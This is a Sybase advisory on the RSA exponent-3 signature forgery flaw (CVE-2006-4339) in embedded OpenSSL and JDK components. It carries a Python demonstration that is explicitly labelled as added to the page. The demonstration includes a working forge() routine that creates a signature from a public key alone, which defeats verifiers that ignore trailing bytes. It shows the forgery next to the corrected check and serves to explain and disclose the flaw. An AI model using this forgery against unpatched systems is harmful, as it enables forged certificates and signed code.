Urgent from Sybase: Preliminary advisory on security vulnerability in RSA signature verification impacting several Sybase products

Summary: This document describes a flaw in which implementations of RSA signature verification, as used in SSL/TLS and other application scenarios, may accept forged signatures as valid, leading to a security vulnerability.


Contents

This document contains the following sections:

  • Customer Alert
  • Recommendation

Customer Alert

Certain Sybase products may be vulnerable to an RSA signature verification implementation flaw that allows forged signatures (for example on X.509 certificates) to be accepted as valid when the RSA public key exponent is 3. This may enable a number of different remote exploits based on forged certificates. For example, it may allow an SSL/TLS client to accept a forged server certificate as valid, or allow an application to accept data or code signed with a forged certificate as valid.

This issue affects multiple vendors' implementations of RSA PKCS#1 v1.5 signature verification, including the JDK/JRE/JSSE and OpenSSL, which are embedded within certain Sybase products.
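The flaw behind this advisory (Bleichenbacher's e=3 forgery, reported in 2006) is a parsing mistake: the verifier decodes the 00 01 FF..FF 00 || DigestInfo block, checks the DigestInfo, and stops, without checking that the DigestInfo is the last thing in the block. With a public exponent of 3 an attacker can then choose a signature value whose cube begins with a valid-looking block and ends in arbitrary bytes, using only the public key. The following is an added example written for this page; it is not Sybase, OpenSSL or JDK code. It generates its own 2048-bit e=3 key in-process (seeded RNG, demo key only), implements the vulnerable verifier pattern beside a correct one, and forges a signature for a message the key never signed. The message strings are constructed sample input.

```python
"""PKCS#1 v1.5, e=3: forged signature accepted by a verifier that ignores trailing bytes."""
import hashlib
import hmac
import random

E = 3
MODULUS_BITS = 2048
# DER prefix of DigestInfo for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")


def is_probable_prime(n, rng, rounds=24):
    """Miller-Rabin primality test; sufficient for a demo key."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def generate_key(bits=MODULUS_BITS, seed=2006):
    """Return (n, d) for public exponent E=3. Seeded RNG: demo key only, never reuse."""
    rng = random.Random(seed)
    half = bits // 2

    def prime():
        while True:
            p = rng.getrandbits(half) | (3 << (half - 2)) | 1   # top two bits set
            if (p - 1) % E != 0 and is_probable_prime(p, rng):  # E must be invertible
                return p

    p, q = prime(), prime()
    return p * q, pow(E, -1, (p - 1) * (q - 1))


def digest_info(msg):
    return SHA256_PREFIX + hashlib.sha256(msg).digest()


def emsa_pkcs1_v15(msg, k):
    """EMSA-PKCS1-v1_5 encoding: 00 01 FF..FF 00 || DigestInfo, exactly k bytes."""
    t = digest_info(msg)
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def sign(n, d, msg):
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(emsa_pkcs1_v15(msg, k), "big"), d, n)


def verify_correct(n, msg, sig):
    """Rebuild the full encoding and compare all k bytes (RFC 8017, section 8.2.2)."""
    k = (n.bit_length() + 7) // 8
    if not 0 <= sig < n:
        return False
    em = pow(sig, E, n).to_bytes(k, "big")
    return hmac.compare_digest(em, emsa_pkcs1_v15(msg, k))


def verify_flawed(n, msg, sig):
    """Vulnerable pattern: parse padding, check DigestInfo, ignore whatever follows."""
    k = (n.bit_length() + 7) // 8
    em = pow(sig, E, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < k and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= k or em[i] != 0x00:   # PS of >= 8 bytes, then a 00 separator
        return False
    t = digest_info(msg)
    return em[i + 1:i + 1 + len(t)] == t      # BUG: never checks i + 1 + len(t) == k


def icbrt_ceil(x):
    """Smallest integer r >= 0 with r**3 >= x."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 >= x:
            hi = mid
        else:
            lo = mid + 1
    return lo


def forge(n, msg):
    """Forgery from the public key alone: aim the cube at the shortest padding the
    flawed verifier accepts and let the trailing bytes be anything."""
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + digest_info(msg)
    free = k - len(prefix)                       # bytes the verifier never looks at
    low = int.from_bytes(prefix, "big") << (8 * free)
    s = icbrt_ceil(low)
    if s ** 3 >= low + (1 << (8 * free)) or s ** 3 >= n:
        raise ValueError("modulus too small for this forgery")  # not the case at 2048 bits
    return s


def demo():
    n, d = generate_key()
    msg = b"CN=legit.example, signed by the CA"          # constructed sample input
    forged_msg = b"CN=attacker.example, never signed"   # constructed sample input
    real, fake = sign(n, d, msg), forge(n, forged_msg)
    return {
        "real_correct": verify_correct(n, msg, real),
        "real_flawed": verify_flawed(n, msg, real),
        "fake_correct": verify_correct(n, forged_msg, fake),
        "fake_flawed": verify_flawed(n, forged_msg, fake),
    }


if __name__ == "__main__":
    print(demo())  # only the flawed verifier accepts the forgery
```

The fix is the one in verify_correct: re-encode the expected block and compare every byte of the decoded signature against it, rather than parsing the decoded block and trusting whatever is left over. The same forged value, if the key were exported, is a direct test of any PKCS#1 v1.5 verifier; for OpenSSL the simpler check is that the embedded library is at least 0.9.7k or 0.9.8c, the releases the linked OpenSSL advisory names as fixed.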

Additional details on this issue are available from CERT Vulnerability VU#845620 at

http://www.kb.cert.org/vuls/id/845620

and also at

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339
http://www.openssl.org/news/secadv_20060905.txt
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102648-1&searchclaus

More detailed information on Sybase products that use RSA signature verification and may be affected by the vulnerability described above can be found in the document below.

Note: As information becomes available the following table will be updated. Please check for updates on a regular basis.

Details of affected products - Last Updated 23rd January 2007.


Recommendation

Sybase is currently working on providing final resolutions and product updates for this issue.

Sybase strongly recommends that customers apply the product updates and follow the product-specific instructions when they become available.

Should an EBF be required, it can be obtained, once available, from the Sybase EBFs and Maintenance site:

http://downloads.sybase.com/

Follow the instructions in the EBF cover letter to install any EBF.


If you require further assistance, please contact your local support center. The contact numbers can be found in the About Support section under Support & Services on the www.sybase.com website:

http://www.sybase.com/contactus/support



Copyright © 2006 Sybase, Inc. All rights reserved.


